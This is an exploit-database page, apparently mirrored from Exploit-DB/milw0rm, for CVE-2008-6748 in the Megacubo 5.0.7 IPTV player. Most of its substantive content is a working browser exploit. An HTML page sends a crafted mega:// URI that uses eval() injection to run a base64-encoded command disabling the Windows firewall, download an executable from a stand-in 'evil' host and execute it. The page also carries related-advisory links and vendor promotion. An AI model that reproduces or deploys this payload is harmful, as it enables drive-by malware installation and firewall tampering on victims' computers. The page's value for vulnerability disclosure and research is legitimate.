Lucene search
+L

Megacubo 5.0.7 - 'mega://' Arbitrary File Download and Execute

🗓️ 01 Jan 2009 00:00:00Reported by JJuniorType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 38 Views

Megacubo 5.0.7 'mega://' Arbitrary File Download and Execute against Windows XP SP

Related
Code
ReporterTitlePublishedViews
Family
circl
Circl
CVE-2008-6748
30 Dec 200800:00
circl
cve
CVE
CVE-2008-6748
24 Apr 200914:00
cve
cvelist
Cvelist
CVE-2008-6748
24 Apr 200914:00
cvelist
exploitdb
Exploit DB
Megacubo 5.0.7 - 'mega://' Remote 'eval()' Injection
30 Dec 200800:00
exploitdb
euvd
EUVD
EUVD-2008-6708
7 Oct 202500:30
euvd
nvd
NVD
CVE-2008-6748
24 Apr 200914:30
nvd
prion
Prion
Sql injection
24 Apr 200914:30
prion
Megacubo 5.0.7 download & Execute
by :JJunior
site: http://www.musicastop.com.br/

tested against Internet Explorer 7 and Mozilla Firefox  1.5  Windows Xp sp 3

software site: http://www.megacubo.net/tv/
download url: http://sourceforge.net/project/showfiles.php?group_id=231636&package_id=280849&release_id=608023

description:
"Megacubo is a IPTV tuner application written in PHP + Winbinder.
It has a catalogue of links of TV streams which are available
for free in the web. At the moment it only runs on Windows(2000,
XP and Vista)."

example exploit, download & Execute :


<html>
<head>
<title>MegaCubo - download & Execute</title>
<meta http-equiv="Content-Type" content="text/html; ">
</head>
<body>
<script>
// url download & exec code evil
evil = 'http://www.example.com/evil.exe';

// disable firewall  encode base_64
firewall = 'bmV0c2ggZmlyZXdhbGwgc2V0IG9wbW9kZSBtb2RlID0gZGlzYWJsZQ==';

shellcode = 'mega://play|con.."a()".system(base64_decode("'+firewall+'")).fputs(fopen("c:/Megacubo.exe","w"),file_get_contents("'+evil+'")).system("C:/Megacubo.exe")."/?");print(';

// shell code
window.location=shellcode;

</script>
</body>
</html>

# milw0rm.com [2009-01-01]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation